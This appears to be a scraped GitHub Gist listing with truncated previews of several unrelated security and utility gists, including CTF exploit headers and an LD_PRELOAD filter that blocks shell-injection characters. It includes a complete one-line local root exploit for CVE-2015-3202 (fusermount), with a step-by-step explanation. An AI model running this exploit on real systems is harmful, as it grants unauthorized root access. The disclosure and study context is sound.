[*] './heapfun4u'
Arch: amd64-64-little
RELRO: Partial RELRO
Aleksei Udovenko hellman
🍊
williballenthin
/ hint_calls.py
Last active
September 29, 2024 15:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| IDA plugin to display the calls and strings referenced by a function as hints. | |
| Installation: put this file in your %IDADIR%/plugins/ directory. | |
| Author: Willi Ballenthin <[email protected]> | |
| Licence: Apache 2.0 | |
| ''' | |
| import idc | |
| import idaapi | |
| import idautils |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from binascii import crc32 | |
| def lcg_step(): | |
| global lcg | |
| lcg = (0x5851F42D4C957F2D * lcg + 0x14057B7EF767814F) % 2**64 | |
| return lcg | |
| def extract(val): | |
| res = 32 + val - 95 * (( | |
| ((val - (0x58ED2308158ED231 * val >> 64)) >> 1) + |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| """Fixing bluetooth stereo headphone/headset problem in debian distros. | |
| Workaround for bug: https://bugs.launchpad.net/ubuntu/+source/indicator-sound/+bug/1577197 | |
| Run it with python3.5 or higher after pairing/connecting the bluetooth stereo headphone. | |
| This will be only fixes the bluez5 problem mentioned above . | |
| Licence: Freeware |
zachriggle
/ README.md
Last active
May 25, 2016 07:20
DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Utility fonction to convert from one form to an other | |
| """ | |
| def to_bits(length, N): | |
| return [int(i) for i in bin(N)[2:].zfill(length)] | |
| def from_bits(N): | |
| return int("".join(str(i) for i in N), 2) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # read/write access to python's memory, using a custom bytearray. | |
| # some code taken from: http://tinyurl.com/q7duzxj | |
| # | |
| # tested on: | |
| # Python 2.7.10, ubuntu 32bit | |
| # Python 2.7.8, win32 | |
| # | |
| # example of correct output: | |
| # inspecting int=0x41424344, at 0x0228f898 |
taviso
/ CVE-2015-3202
Created
May 21, 2015 12:52
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
| 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
| a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
| # Here's how it works, $a holds the name of a shellscript to be executed as | |
| # root. | |
| a=/tmp/.$$; | |
| # $b is used twice, first to build the contents of shellscript $a, and then as |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <dlfcn.h> | |
| #include <string.h> | |
| int system(const char *cmd) { | |
| static int (*realsystem)(const char *); | |
| if (!realsystem) realsystem = dlsym(RTLD_NEXT, "system"); | |
| if (strchr(cmd, ';') || strchr(cmd, '`') || strstr(cmd, "&&") || strstr(cmd, "../")) { | |
| return 1; | |
| } |
g05u
/ alewife_exploit.py
Last active
August 29, 2015 14:16
Boston ctf party alewife writeup/exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct, sys, time | |
| from nulllife import * | |
| import ast | |
| # @_g05u_ | |
| #boston ctf party 2015 | |
| # exploit alewife chall | |
| # www.null-life.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <cstdio> | |
| #include <cstring> | |
| #include <cassert> | |
| #include <cstdint> | |
| #include <algorithm> | |
| #include <queue> | |
| #include <openssl/sha.h> | |
| #define LOG(fmt, ...) \ | |
| fprintf(stderr, "[%.2f] %s:%d - " fmt, 1.0 * clock() / CLOCKS_PER_SEC, \ |